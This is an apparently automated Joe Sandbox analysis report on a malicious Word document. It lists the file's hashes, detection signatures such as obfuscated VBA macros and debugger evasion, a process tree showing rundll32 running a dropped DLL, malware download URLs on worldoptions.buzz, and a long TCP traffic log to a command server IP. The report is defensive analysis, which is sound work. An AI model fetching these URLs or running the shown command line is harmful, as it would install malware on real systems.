Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
template[1].doc

Overview

General Information

Sample Name:template[1].doc
Analysis ID:683638
MD5:8f21756219d4e736219011174eb0534b
SHA1:4429c35b62d55abe159e130c095fc988e640f3fd
SHA256:394c97cc9d567e556a357f129aea03f737cbd2a1761df32146ef69d93afc73dc
Tags:doc
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for URL or domain
Document contains an embedded VBA which contains extensive loops (likely to delay execution)
Document contains an embedded VBA with many string operations indicating source code obfuscation
Office process drops PE file
Machine Learning detection for sample
Document contains an embedded VBA macro with suspicious strings
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Document exploit detected (UrlDownloadToFile)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Document contains an embedded VBA macro which executes code when the document is opened / closed
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
Potential document exploit detected (unknown TCP traffic)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Uses a known web browser user agent for HTTP communication
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 752 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • taskeng.exe (PID: 412 cmdline: taskeng.exe {42E32873-DCC3-405E-9458-A04BFDF9CD6F} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)
    • rundll32.exe (PID: 1748 cmdline: C:\Windows\system32\rundll32.exe "C:\Users\user\AppData\Local\Temp\dnrdfsi11023.dll",Rdwmnjioffws MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: template[1].docVirustotal: Detection: 12%Perma Link
Source: http://worldoptions.buzz/agE7nqQLgssuVeUY/OGHAYZZFhfCtspqorBFNYMrxHN7TXIlz8vjv1TPmuyrc2yIu.mp4Avira URL Cloud: Label: malware
Source: http://worldoptions.buzz/agE7nqQLgssuVeUY/OGHAYZZFhfCtspqorBFNYMrxHN7TXIlz8vjv1TPmuyrc2yIu.pngAvira URL Cloud: Label: malware
Source: template[1].docJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\dnrdfsi11023.dllJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\wnitmpo.dllJoe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknownHTTPS traffic detected: 142.250.185.228:443 -> 192.168.2.22:49172 version: TLS 1.2
Source: unknownHTTPS traffic detected: 64.52.80.180:443 -> 192.168.2.22:49175 version: TLS 1.2

Software Vulnerabilities

barindex
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: wnitmpo.dll.0.drJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\wnitmpo.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\dnrdfsi11023.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToCacheFileA
Source: global trafficDNS query: name: worldoptions.buzz
Source: global trafficDNS query: name: www.google.com
Source: global trafficDNS query: name: com.lightbuzear.buzz
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
